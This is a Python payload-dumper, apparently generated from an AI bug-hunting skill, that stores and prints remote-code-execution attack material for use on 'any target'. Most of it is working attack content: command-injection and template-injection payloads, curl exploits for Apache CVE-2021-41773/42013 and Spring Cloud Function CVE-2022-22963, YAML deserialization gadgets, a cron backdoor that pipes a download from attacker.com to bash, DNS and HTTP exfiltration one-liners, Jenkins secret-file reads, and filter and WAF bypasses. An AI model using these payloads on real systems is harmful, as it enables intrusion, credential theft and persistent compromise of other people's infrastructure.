#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AUTO-GENERATED from Cybermes skill: claude-bughunter/hunt-rce

Skill: Generic polyglot — works across Jinja2, Twig, Freemarker, Pebble, Velocity
Desc : Hunting skill for rce vulnerabilities. Built from 67 public bug bounty reports. Use when hunting rce on any target.

Run:  python claude-bughunter-hunt-rce.py --help
      python claude-bughunter-hunt-rce.py --list
      python claude-bughunter-hunt-rce.py --dump <section>
"""
import sys, json, argparse

NAME = 'claude-bughunter/hunt-rce'
TITLE = 'Generic polyglot — works across Jinja2, Twig, Freemarker, Pebble, Velocity'
DESCRIPTION = 'Hunting skill for rce vulnerabilities. Built from 67 public bug bounty reports. Use when hunting rce on any target.'

PAYLOADS = {
    'main': ["name: hunt-rce", "description: Hunting skill for rce vulnerabilities. Built from 67 public bug bounty reports. Use when hunting rce on any target.", "sources: github, hackerone_public", "report_count: 67"],
    'autonomous-testing-priority': ["**Content-type is the #1 silent failure mode for command injection.**", "Traditional web forms use `Content-Type: application/x-www-form-urlencoded`. If you send a JSON body (`{\"host\":\"127.0.0.1;id\"}`) to a form endpoint, the server reads `request.form['host']` and gets nothing \u2014 the app executes normally with no injection, returning a plausible 200 response. You get a false negative with no indication anything went wrong.", "**Rule:** If the page has an HTML form (`<form method=\"POST\">`), use form-encoding. If the path is `/api/...` or the response is JSON, use JSON.", "**Command injection operators to try (in order of prevalence):**", "value;id        \u2190 Unix semicolon (most common)", "value|id        \u2190 pipe", "value&&id       \u2190 AND", "value$(id)      \u2190 subshell", "value`id`       \u2190 backtick", "**Proof:** OS command output (`uid=N(username) gid=...`) in the response body confirms code execution. The output may be HTML-wrapped \u2014 that still counts. If the response is otherwise normal (200, expected content) with the command output appended or embedded, exploitation is confirmed."],
    'crown-jewel-targets': ["RCE vulnerabilities command the highest payouts in bug bounty programs because they grant attackers direct execution control over target infrastructure. The highest-value targets are:", "**Highest-paying asset types:**", "- **Enterprise server products** (GitHub Enterprise Server, self-hosted GitLab) \u2014 privilege escalation chains from low-privileged console roles to root SSH access consistently pay critical/high", "- **Supply chain / package registries** \u2014 dependency confusion attacks against npm, PyPI, etc. hit critical severity across every major program", "- **Cloud-native infrastructure** \u2014 exposed Kubernetes API servers, ingress controllers, and misconfiqured CI/CD pipelines", "- **Mobile app backends and OAuth flows** \u2014 where server-side processing of attacker-controlled data meets execution contexts", "- **Admin/management consoles** \u2014 template injection in configuration panels reaches root with a single payload", "**Why this class pays most:**", "- Blast radius is infrastructure-wide, not user-scoped", "- Proof-of-concept is unambiguous \u2014 shell output is undeniable", "- Fix requires architectural changes, not just a patch", "- Programs cannot afford false negatives on RCE"],
    'attack-surface-signals': [],
    'url-patterns': ["/management-console/*", "/admin/settings/*", "/api/v*/exec", "/api/v*/run", "/webhook/*", "/_internal/*", "/import?url=", "/render?template=", "/preview?format="],
    'response-headers-tech-stack-signals': ["X-Powered-By: Express          # Node.js \u2014 npm dependency surface", "X-Powered-By: Phusion Passenger", "Server: nginx (ingress-nginx)  # Kubernetes ingress \u2014 path field injection", "X-Runtime: Ruby                # Rails ActiveStorage, RDoc, REXML attack surface", "Content-Type: application/yaml # YAML parsers (SnakeYAML, Psych) \u2014 deserialization", "X-GitHub-Enterprise-Version    # GHAS \u2014 nomad template, collectd, syslog-ng injection"],
    'javascript-frontend-signals': ["```javascript", "// Look for these patterns in JS bundles", "fetch('/api/exec', {method:'POST', body: cmd})", "eval(userInput)", "new Function(userInput)", "document.write(unsafeData)", "window.location = userControlled  // URL scheme bypass \u2192 JS execution"],
    'tech-stack-signals': [],
    'step-by-step-hunting-methodology': ["1. **Map the execution contexts first.** Before testing payloads, identify everywhere user-controlled input touches an execution layer: template engines, shell commands, YAML parsers, file paths used in operations, package resolution, and configuration files.", "2. **Enumerate admin/management interfaces.** Crawl for `/management-console`, `/admin`, `/_internal`, `/setup`, `/config`. These surfaces are lower-auth and higher-privilege \u2014 the GHES cluster produced 6 separate RCEs from one console role.", "3. **Check template injection in every config field.** In any management UI that accepts free-form configuration (log destinations, notification formats, proxy settings), submit `{{7*7}}`, `${7*7}`, `<%= 7*7 %>`. Look for `49` in responses, logs, or DNS callbacks.", "4. **Test YAML/XML/serialized input for code execution.** Any endpoint accepting `Content-Type: application/yaml` or `application/xml`:", "- SnakeYAML: submit `!!javax.script.ScriptEngineManager` gadget", "- Ruby YAML: submit `!ruby/object:Gem::Installer` gadget", "- REXML: submit billion-laughs / quadratic blowup XML", "5. **Hunt dependency confusion.** For every npm/pip/gem internal package name visible in JS bundles, error messages, or `package.json` in public repos \u2014 register a higher-versioned package on the public registry pointing to a canary callback.", "6. **Check file path operations for traversal \u2192 execution.** ActiveStorage, file upload handlers, symlink operations: submit `../../../etc/cron.d/shell` as filename. Confirm write then trigger execution.", "7. **Audit Kubernetes/cloud-native surfaces.** Run `kubectl` against any exposed API server. Check ingress annotations, especially `nginx.ingress.kubernetes.io/configuration-snippet` and `spec.rules.http.paths.path` for Lua/regex injection.", "8. **Test OAuth redirect URI and URL scheme handlers.** Mobile apps processing `javascript:` or `intent://` URIs via OAuth redirect may execute JavaScript. Try `javascript:alert(document.cookie)` and custom scheme URIs.", "9. **Verify with out-of-band callbacks.** Never rely solely on visible output. Use Burp Collaborator, interactsh, or `canarytokens.org` DNS tokens. Blind RCE is common in backend processors.", "10. **Chain privileges.** A low-severity misconfiguration (editor role, CSRF, path traversal) combined with an RCE primitive equals critical. Always ask: \"what can I reach from here?\""],
    'payload-detection-patterns': [],
    'template-injection-probes': [],
    'generic-polyglot-works-across-jinja2-twig-freemarker-pebble-velocity': ["{{7*7}}${7*7}#{7*7}<%= 7*7 %>*{7*7}", "{{'7'*7}}", "{{config}}", "{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}"],
    'nomad-template-injection-go-text-template': ["{{ env \"NOMAD_SECRET_ID\" }}", "{{ with secret \"secret/data/prod\" }}{{ .Data.password }}{{ end }}", "{{ runscript \"id\" }}"],
    'apache-http-server-alias-path-traversal-cve-2021-41773-cve-2021-42013': ["Path normalization bug in Apache 2.4.49 (and the 2.4.50 patch-bypass) lets an attacker escape DocumentRoot via dot-encoded segments **through configured alias paths**. The same primitive yields very different impact depending on which alias accepts the traversal:", "- Alias without `Options +ExecCGI` (e.g. `/icons/`) \u2192 arbitrary file read only", "- Alias with `Options +ExecCGI` (e.g. `/cgi-bin/`) \u2192 arbitrary code execution", "**Version fingerprint:**", "```bash", "curl -sI http://target/ | grep -i \"Server:\""],
    'vulnerable-apache-2-4-49-cve-2021-41773-or-apache-2-4-50-cve-2021-42013': [],
    'patched-apache-2-4-51': ["**File-read test (any alias):**", "```bash", "curl --path-as-is \"http://target/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd\""],
    'note-path-as-is-is-required-curl-normalizes-2e-by-default': ["**RCE test (cgi-enabled alias only):**", "```bash", "curl --path-as-is -X POST \\", "-d \"echo Content-Type: text/plain; echo; id; uname -a; hostname\" \\", "\"http://target/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh\"", "**Triage discipline note:** when the same path-traversal primitive works on multiple aliases but only one is CGI-enabled, the **maximum** impact is the severity \u2014 not the average. A \"file read\" finding on `/icons/` should always be escalated by re-probing `/cgi-bin/` (and any other alias visible from `<Directory>` blocks in the server-info disclosure or response patterns). See `triage-validation` Pre-Severity Gate."],
    'spring-cloud-function-spel-injection-cve-2022-22963': ["Spring Cloud Function \u2264 3.2.2 (and \u2264 3.1.6) evaluates the `spring.cloud.function.routing-expression` header as a SpEL expression on the `/functionRouter` endpoint without auth, before any routing logic. Wide deployment in AWS Lambda + Cloud Run + on-prem function platforms. Often exposed externally because `/functionRouter` auto-registers and devs don't add an explicit gate.", "**Detection:**", "- Spring-style port 8080 with `/uppercase`, `/lowercase`, or arbitrary single-word function endpoints responding 200", "- Confirm with `curl -s http://target:8080/uppercase -H \"Content-Type: text/plain\" --data-binary \"test\"` \u2192 returns `TEST`", "- Version banner via `/actuator/info` or response headers", "**Exploit:**", "```bash", "curl -X POST http://target:8080/functionRouter \\", "-H \"Content-Type: text/plain\" \\", "-H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"})' \\", "--data \"x\"", "The `new String[]{\"...\", \"...\"}` array form avoids shell-quoting issues that break the more common `.exec(\"id\")` form when the SpEL header contains parentheses or quotes.", "**Generalizes to:** any Spring application that takes user input into a `SpelExpressionParser.parseExpression()` call, especially when delivered via header / query-param routes that bypass normal auth filters. See `hunt-ssti` for the broader SpEL fingerprinting (`*{7*7}` = Spring Thymeleaf)."],
    'snakeyaml-rce-gadget': ["```yaml", "!!javax.script.ScriptEngineManager [", "!!java.net.URLClassLoader [[", "!!java.net.URL [\"http://attacker.com/exploit.jar\"]"],
    'ruby-yaml-rdoc-options-rce': ["```yaml"],
    'dependency-confusion-detection': ["```bash"],
    'find-internal-package-names': ["grep -r '\"name\"' node_modules/ | grep '@internal\\|@company\\|@private'"],
    'check-if-public-registry-has-higher-version': ["npm view @target-company/internal-package version 2>/dev/null"],
    'ingress-nginx-path-injection': [],
    'in-spec-rules-http-paths-path': ["/something)(;.*);#"],
    'results-in-nginx-config-injection': [],
    'kubernetes-exposed-api-check': ["```bash", "curl -sk https://TARGET:6443/api/v1/namespaces/default/pods \\", "-H \"Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\"", "kubectl --insecure-skip-tls-verify -s https://TARGET:6443 get pods --all-namespaces"],
    'out-of-band-rce-confirmation': ["```bash"],
    'payload-to-confirm-blind-rce-via-dns': ["curl \"http://$(id | base64).YOUR-INTERACTSH-URL/\"", "nslookup $(whoami).attacker.com", "wget http://attacker.com/$(cat /etc/hostname)"],
    'activestorage-path-traversal-rce': [],
    'filename-in-upload-request': ["filename=\"../../../../etc/cron.d/backdoor\""],
    'cron-payload-content': ["* * * * * root curl http://attacker.com/shell | bash"],
    'args4j-prefix-file-expansion-jenkins-cve-2024-23897-family': ["Java CLIs built on the `args4j` library default to `expandAtFiles=true`, which expands `@filename` arguments by reading the file and treating each line as a separate command argument. When such a CLI is exposed over HTTP (Jenkins CLI is the canonical case), the server-side error message echoes failed arguments back \u2014 turning argument echoing into an arbitrary file-read primitive. Unauthenticated when \"anonymous read access\" is on (Jenkins default for fresh installs).", "**Detection:**", "- Target exposes `/cli` and `/jnlpJars/jenkins-cli.jar` (Jenkins family)", "- Or: any Java app whose CLI source uses args4j without `expandAtFiles=false`", "**Test (Jenkins):**", "```bash"],
    'get-the-legit-cli-jar-from-the-target': ["curl -sLO http://target:8080/jnlpJars/jenkins-cli.jar"],
    'first-line-of-file-leaks-via-help-error': ["java -jar jenkins-cli.jar -s http://target:8080/ -http help 1 @/etc/passwd"],
    'error-too-many-arguments-root-x-0-0-root-root-bin-bash': [],
    'full-file-leaks-via-connect-node-every-line-returned-as-a-no-such-agent-error': ["java -jar jenkins-cli.jar -s http://target:8080/ -http connect-node @/etc/passwd"],
    'all-passwd-lines-echoed-back': [],
    'recon-env-vars-jenkins-home-path': ["java -jar jenkins-cli.jar -s http://target:8080/ -http help 1 @/proc/self/environ", "**Crown-jewel files after JENKINS_HOME confirmed:**", "- `/var/jenkins_home/secret.key` \u2014 master encryption key for stored credentials", "- `/var/jenkins_home/secrets/master.key` \u2014 derives the encryption key", "- `/var/jenkins_home/credentials.xml` \u2014 credential store (encrypted with secret.key \u2014 pair with offline decrypt tools)", "- `/var/jenkins_home/users/*/config.xml` \u2014 per-user API tokens (often unencrypted)", "- `/var/jenkins_home/jobs/*/config.xml` \u2014 pipeline configs that may inline AWS keys, SSH keys, registry tokens", "**Pattern generalizes beyond Jenkins.** Any Java service that:", "1. Embeds args4j (most enterprise Java CLIs since 2010s)", "2. Exposes the CLI handler over HTTP (Jenkins, Hudson forks, custom internal tools)", "3. Returns argument-parsing errors verbatim to the client", "\u2192 same arbitrary-read primitive applies. Validation via `triage-validation` Reproducibility Gate: confirm the leak on at least 2 distinct commands (e.g., `help` and `connect-node`) and verify the file content actually appears in the response, not just a generic 500."],
    'grep-patterns-for-source-review': ["```bash"],
    'command-injection-sinks': ["grep -rn \"exec\\|system\\|popen\\|spawn\\|eval\\|subprocess\" --include=\"*.rb\" .", "grep -rn \"Runtime.exec\\|ProcessBuilder\\|ScriptEngine\" --include=\"*.java\" ."],
    'template-engine-instantiation': ["grep -rn \"Mustache\\|Handlebars\\|nunjucks\\|render_template\\|Template\\(\" ."],
    'unsafe-yaml-load': ["grep -rn \"yaml\\.load\\b\\|YAML\\.load\\b\" . # without Loader= argument", "grep -rn \"Yaml()\\|new Yaml()\" --include=\"*.java\" ."],
    'common-root-causes': ["**1. Configuration-as-code with insufficient sanitization**", "Administrators edit configuration files (syslog-ng, collectd, nomad) through web UIs. Developers assume admin == trusted, so they pass field values directly into config files that support execution primitives (`program()` destinations, exec plugins, template functions).", "**2. Template engines in privileged contexts**", "Go's `text/template`, Freemarker, Velocity, and Twig are used for system configuration rendering. When user-controlled strings reach these engines without sandboxing, arbitrary code follows.", "**3. Dependency confusion / namespace squatting**", "Internal packages published to private registries without locking the public registry namespace. Build systems that prefer public registries by default, or that fall through to public when the private registry lacks a package.", "**4. Unsafe deserialization of YAML/XML**", "Developers use `YAML.load()` without safe loaders, or `new Yaml()` (SnakeYAML) without type restrictions. Ruby's `YAML.load` and Java's SnakeYAML both support arbitrary object instantiation by default.", "**5. Path traversal in file operation chains**", "Filenames accepted from user input are used in filesystem operations without normalization. Rails ActiveStorage, file upload handlers, and rdoc generators trust the `filename` parameter.", "**6. Assuming low-privilege roles can't reach execution contexts**", "The GHES management console granted \"Editor\" roles access to configuration fields that touched shell execution. Developers assumed privilege boundaries existed at a higher architectural level.", "**7. Missing input validation on infrastructure-facing fields**", "Ingress/nginx annotation values, Kubernetes spec fields, and webhook URLs are treated as opaque strings \u2014 but the downstream processor (nginx config generator, regex engine) interprets them as code."],
    'bypass-techniques': [],
    'bypass-shell-metacharacter-filtering': ["```bash"],
    'blocked': [],
    'bypass-using-ifs-and-encodings': ["cat${IFS}/etc/passwd", "{cat,/etc/passwd}", "$'\\x63\\x61\\x74' /etc/passwd  # hex encoding", "$(printf '\\x63\\x61\\x74') /etc/passwd"],
    'newline-injection-when-semicolons-blocked': ["payload=$'\\ncurl attacker.com\\n'"],
    'bypass-url-scheme-allowlist-javascript-blocked': [],
    'mobile-apps-often-block-javascript-but-miss': ["jAvAsCrIpT:alert(1)          # case variation", "javascript&#58;alert(1)      # HTML entity", "javascript:void(alert(1))    # void wrapper", "intent://attacker.com#Intent;scheme=javascript;...", "data:text/html,<script>alert(1)</script>"],
    'bypass-yaml-safe-load-type-restrictions': ["```yaml"],
    'if-java-is-blocked-try-legitimate-classes-with-side-effects': ["!!com.sun.rowset.JdbcRowSetImpl", "dataSourceName: 'ldap://attacker.com/a'", "autoCommit: true"],
    'or-find-allowlisted-types-with-dangerous-constructors': [],
    'bypass-npm-scope-restrictions': [],
    'if-company-is-monitored-look-for-unscoped-internal-names': [],
    'e-g-internal-utils-instead-of-company-internal-utils': [],
    'public-registries-serve-unscoped-packages-first': [],
    'bypass-path-traversal-filters': [],
    'basic-filter-bypass': ["../           \u2192 ..%2F \u2192 %2e%2e%2f \u2192 ....//"],
    'double-encoding': ["%252e%252e%252f"],
    'unicode-normalization': ["..%c0%af  (overlong UTF-8)"],
    'null-byte-older-systems': ["../../etc/passwd%00.jpg"],
    'bypass-template-injection-with-output-filtering': [],
    'if-is-sanitized-on-output-but-not-evaluation': ["{% for x in range(1) %}{{ lipsum.__globals__.os.popen('id').read() }}{% endfor %}"],
    'blind-use-dns-callback-instead-of-output': ["{{ lipsum.__globals__.os.popen('nslookup $(id).attacker.com').read() }}"],
    'bypass-waf-blocking-exec-system-popen': ["```ruby"],
    'ruby': ["send(:system, \"id\")", "method(:exec).call(\"id\")", "Kernel.send(:`, \"id\")", "Object.const_get(:Kernel).system(\"id\")"],
    'gate-0-validation': ["Before writing the report, confirm all three:", "**1. What can the attacker DO right now?**", "You must be able to demonstrate one of: execute `id`/`whoami` and capture the output, make a DNS/HTTP callback from the target server to your controlled host, write a file to the filesystem, or read `/etc/passwd`. \"Might be able to\" fails this gate.", "**2. What does the victim LOSE?**", "Articulate the concrete impact: source code exfiltration, credential theft (database, API keys, cloud IAM), lateral movement to internal network, supply chain compromise of downstream users, data destruction. Generic \"attacker gains RCE\" fails \u2014 name the crown jewels at risk.", "**3. Can it be reproduced in 10 minutes from scratch?**", "Write the reproduction steps before submitting. If you need more than: (a) a Burp request, (b) a payload file, and (c) a listener \u2014 simplify it. If reproduction requires a specific race condition, timing, or ephemeral state, document the exact conditions. Triagers who can't reproduce in one attempt will downgrade or close the report."],
    'real-impact-examples': ["**Scenario A: Management Console Role \u2192 Root Shell (Enterprise Server)**", "An attacker with a low-privileged \"Management Console Editor\" account on a GitHub Enterprise Server instance identified that the syslog-ng configuration UI accepted a free-form \"destination\" field. By injecting a `program()` destination containing a reverse shell command, the attacker caused the syslog-ng daemon (running as root) to execute arbitrary OS commands upon log receipt. The same attack surface was independently found in collectd's exec plugin configuration and nomad's job template rendering \u2014 all reachable from the same editor role. Impact: full root compromise of the enterprise git server hosting all organization source code, secrets, and CI/CD pipelines.", "**Scenario B: Dependency Confusion \u2192 RCE on Build Infrastructure**", "A researcher enumerated internal npm package names by reviewing JavaScript bundles served from target CDN endpoints and public GitHub repositories belonging to a major payments platform. Several `@internal/*` scoped packages were referenced but not registered on the public npm registry. The researcher published higher-versioned packages with identical names containing a postinstall script that executed a canary callback. Within hours, the callback fired from multiple IP addresses belonging to the target's CI/CD build farm \u2014 confirming that every npm install on their build infrastructure executed attacker-controlled code. The same technique worked against a ride-sharing platform's internal tooling. Impact: arbitrary code execution on build servers with access to production deployment credentials and signing keys.", "**Scenario C: Exposed Kubernetes API \u2192 Cluster Takeover**", "During reconnaissance on a target's cloud infrastructure, a researcher discovered a publicly accessible Kubernetes API server (port 6443) with overly permissive RBAC. Using default service account tokens and unauthenticated API calls, the researcher enumerated running pods, retrieved secrets from the default namespace (including database credentials and third-party API keys), and demonstrated the ability to spawn privileged pods with `hostPID: true` \u2014 enabling full node compromise. The Kubernetes cluster managed the target's core production services. Impact: access to all stored secrets, ability to deploy malicious workloads, and pivot to every service in the cluster."],
    'chains-compositions-senior-hunting': ["RCE in 2020-2026 rarely arrives at a single sink. Every modern RCE is composed of (1) a primitive that puts attacker bytes onto the host or into a deserialization pipeline, plus (2) an exec gadget that interprets them. The chains below decompose six high-paying RCE shapes into their primitive components \u2014 each step is testable in isolation, the chain is what pays."],
    'chain-1-ssrf-imdsv1-leaked-iam-role-lambda-invoke-backend-rce-capital-one-pattern': ["- **A.** SSRF on a server-side fetcher (link-preview, image proxy, webhook URL, PDF generator). Confirmed via Burp Collaborator OOB callback.", "- **B.** Point SSRF at AWS IMDSv1 metadata: `http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>` \u2192 returns temporary STS credentials.", "- **C.** Use the credentials with `aws lambda invoke --function-name <internal-function>` \u2014 Lambda runs server-side code that the attacker can influence via the function's input parameter.", "- **Impact:** Full backend RCE in the Lambda context, plus pivot path to whatever else the role grants (S3 / DynamoDB / RDS).", "- **Real shape:** Capital One 2019 \u2014 $80M civil penalty, attacker conviction. SSRF in a WAF on EC2 \u2192 IMDSv1 \u2192 IAM role \u2192 106M-record breach via S3 sync. Cross-refs `hunt-ssrf` Disclosed Report Citation #6."],
    'chain-2-sqli-copy-from-program-direct-os-level-rce-on-postgres-host': ["- **A.** SQLi confirmed on a Postgres backend (boolean/time-based works; UNION not needed).", "- **B.** The DB user has either `pg_read_server_files` or `COPY` privileges (default for many AWS RDS / Google Cloud SQL roles when \"admin\" databases exist).", "- **C.** Stack a query: `'; COPY users FROM PROGRAM 'curl http://attacker/x.sh | bash'; --` \u2192 Postgres shells out to `/bin/sh -c <attacker command>` \u2192 RCE as `postgres` user.", "- **Impact:** RCE as the database user, which on managed Postgres frequently has IAM credentials and direct access to other AWS resources.", "- **Real shape:** Multiple H1 disclosures 2020-2024 across SaaS apps backed by Postgres. Cross-refs `hunt-sqli` Disclosed Report Citation #12 and root cause discussion of `FILE`/`xp_cmdshell` privileges."],
    'chain-3-image-upload-path-traversal-in-filename-misconfigured-mime-serving-webshell': ["- **A.** File upload accepts images (`image/png`, `image/jpeg`). The server saves with the user-supplied filename or only validates Content-Type, not actual content.", "- **B.** Upload a `.aspx`/`.jsp`/`.php` file with the correct image magic-bytes (`GIF89a` + PHP after) and a filename containing `../` to write outside the upload directory into the web-root (`../../../public/webshell.php`).", "- **C.** Request `https://target/webshell.php?cmd=id` \u2014 server's PHP/ASP.NET handler runs the script regardless of extension policy because the path doesn't pass through the upload-dir filter.", "- **Impact:** Unauthenticated or low-priv attacker gets webshell on the application server with the web-server's process privileges.", "- **Real shape:** Multiple disclosed H1 cases on legacy upload handlers; canonical pre-2020 RCE class. Pairs with `hunt-file-upload` (upload bypass table) and `hunt-misc` path-traversal patterns."],
    'chain-4-prototype-pollution-lodash-mongoose-gadget-chain-child-process-spawn-node-rce': ["- **A.** Identify prototype pollution sink \u2014 JSON merge / Object.assign / lodash `_.merge` / Node `Object.create` chain receiving attacker JSON.", "- **B.** Pollute `Object.prototype.shell` to `true` OR `Object.prototype.env.NODE_OPTIONS` to `--require ./malicious.js`. The polluted prototype reaches a downstream `child_process.spawn` or `vm.runInThisContext`.", "- **C.** Sink executes with attacker-controlled shell/env \u2192 attacker code runs in Node.js process context with full access to environment variables, AWS metadata, internal services.", "- **Impact:** Server-side JS execution from a JSON POST. Common in Express apps using `body-parser` + `lodash.merge` for config-merging.", "- **Real shape:** `lodash.merge` CVE-2018-16487, CVE-2019-10744, CVE-2020-8203; `mongoose` CVE-2024-53900 (cross-refs `hunt-sqli` Disclosed Report Citation #10 \u2014 same gadget family reaches Mongo `$where` instead of process)."],
    'chain-5-unencrypted-viewstate-recovered-machinekey-asp-net-deserialization-rce-toolshell-class': ["- **A.** Identify an ASP.NET endpoint where `__VIEWSTATEENCRYPTED=\"\"` (ViewState is signed but not encrypted). Confirm via Burp / curl on form-bearing pages.", "- **B.** Recover the `<machineKey>` validationKey \u2014 via config leak (`/web.config` accessible), via subdomain takeover of a sibling app sharing the key, or via the CVE-2025-53771 ToolShell exploit chain that exfils the key on Subscription Edition.", "- **C.** Forge a ViewState using `ysoserial.net --plugin=ViewState --validationkey=<key>` with a `TypeConfuseDelegate` / `WindowsIdentity` payload. Submit to the endpoint. ASP.NET deserialises into a method-call gadget chain ending in `Process.Start` \u2192 RCE as the worker-process identity.", "- **Impact:** Full RCE on the IIS web front-end with whatever the AppPool identity grants \u2014 often `NETWORK SERVICE` (with SharePoint farm-account access) or higher.", "- **Real shape:** CVE-2025-53770 / 53771 ToolShell (July 2025 emergency advisory); SP2013 unpatched-by-EoL exposure. Cross-refs `hunt-sharepoint` ToolShell precondition chain and `hunt-aspnet` ViewState dual-parser anti-pattern."],
    'chain-6-xxe-php-expect-stream-wrapper-direct-rce-on-legacy-php': ["- **A.** XXE confirmed via OOB DTD callback (`<!ENTITY % x SYSTEM \"http://attacker/dtd\">`).", "- **B.** Target runs PHP with the `expect` extension enabled (rare in 2026, but still present on legacy hosts and some shared-hosting providers).", "- **C.** Send `<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"expect://id\">]><foo>&xxe;</foo>` \u2014 PHP's stream wrapper executes `id` through expect \u2192 output returned in entity expansion or via OOB.", "- **Impact:** RCE as the PHP/web-server user without needing a separate upload or SQLi primitive.", "- **Real shape:** Rockstar Games emblem editor XXE H1 #347139 (2018, $1,500); Adobe Commerce CosmicSting CVE-2024-34102 (XXE \u2192 RCE via crypt-key exfil). Cross-refs `hunt-xxe` Disclosed Report Citation #7 and #10."],
    'operator-level-pattern': ["Every modern RCE chain has two halves: **the bytes get there** (SSRF, SQLi, upload, prototype-pollution, ViewState, XXE) and **the bytes get interpreted** (lambda invoke, COPY PROGRAM, webshell handler, child_process.spawn, deserializer gadget, expect://). Hunt for the first half; the second is usually one of the six above. If your first-half primitive doesn't compose with any of these \u2014 pause before submitting. \"Could lead to RCE\" is Low/Medium; \"RCE demonstrated end-to-end\" is Critical.", "Cross-references:", "- `hunt-ssrf` \u2014 Chain 1", "- `hunt-sqli` \u2014 Chain 2", "- `hunt-file-upload` \u2014 Chain 3", "- `hunt-api-misconfig` (proto-pollution) \u2014 Chain 4", "- `hunt-sharepoint` + `hunt-aspnet` \u2014 Chain 5", "- `hunt-xxe` \u2014 Chain 6"],
    'related-skills-chains': ["- **`hunt-ssti`** \u2014 Template engines that hit `eval()`/`exec()`/`os.system()` are RCE hiding behind a render call. Chain primitive: Jinja2 `{{config.__class__.__init__.__globals__['os'].popen('id').read()}}` reflected in email-template preview \u2192 unauthenticated RCE as the worker process.", "- **`hunt-file-upload`** \u2014 File-write primitives become RCE when the upload directory is web-served, processed by a deserializer, or loaded by a `.htaccess`/`web.config`. Chain primitive: SVG/PHP polyglot bypasses MIME check \u2192 direct `GET /uploads/shell.php?cmd=id` \u2192 RCE; or DOCX with `phar://` stream wrapper \u2192 PHP object deserialization \u2192 RCE.", "- **`hunt-ssrf`** \u2014 When the RCE primitive lives on an internal-only endpoint (admin console, internal Redis, Jenkins script-console), gate it through an SSRF. Chain primitive: external SSRF \u2192 `http://127.0.0.1:8080/manage/scriptText` (Jenkins/Tomcat) \u2192 Groovy `Runtime.exec` \u2192 RCE; or SSRF \u2192 `gopher://redis:6379` write to crontab \u2192 RCE.", "- **`hunt-aspnet`** \u2014 ASP.NET ViewState deserialization is a giant RCE class behind a known `__VIEWSTATE` parameter. Chain primitive: machineKey recovery (or leaked `<machineKey>` from `web.config` disclosure) \u2192 `ysoserial.net -p ViewState -g TypeConfuseDelegate` \u2192 RCE as `IIS APPPOOL\\<name>`.", "- **`security-arsenal`** \u2014 Reach for the deserialization payload tree (ysoserial Java gadget chains, ysoserial.net for .NET ViewState/BinaryFormatter, Python pickle `__reduce__`, Ruby Marshal, PHP `phar://` metadata, Node `node-serialize` IIFE) the moment you have a sink that accepts serialized bytes.", "- **`triage-validation`** \u2014 Apply the Pre-Severity Gate before claiming Critical. A \"blind RCE\" that turns out to be file-write-only with no execution path is not RCE; a sandboxed eval that can't reach `os` is at best Medium SSTI. Prove `whoami`/OOB DNS callback with a unique marker before writing the report."],
}

def main():
    ap = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("--list", action="store_true", help="list sections")
    ap.add_argument("--dump", metavar="SECTION", help="dump payloads for a section")
    ap.add_argument("--search", metavar="KEYWORD", help="search payloads")
    args = ap.parse_args()
    if args.list or not (args.dump or args.search):
        print("=== %s ===" % TITLE)
        print(DESCRIPTION)
        print()
        print("Sections (%d):" % len(PAYLOADS))
        for k in PAYLOADS:
            print("  -", k, "(%d payloads)" % len(PAYLOADS[k]))
        if args.list:
            return
    if args.dump:
        if args.dump not in PAYLOADS:
            print("Section not found. Available:", list(PAYLOADS.keys()))
            sys.exit(1)
        for p in PAYLOADS[args.dump]:
            print(p)
        return
    if args.search:
        q = args.search.lower()
        hits = 0
        for k, v in PAYLOADS.items():
            for p in v:
                if q in p.lower():
                    print("[%s] %s" % (k, p))
                    hits += 1
        print("\n%d hits" % hits)
        return

if __name__ == "__main__":
    main()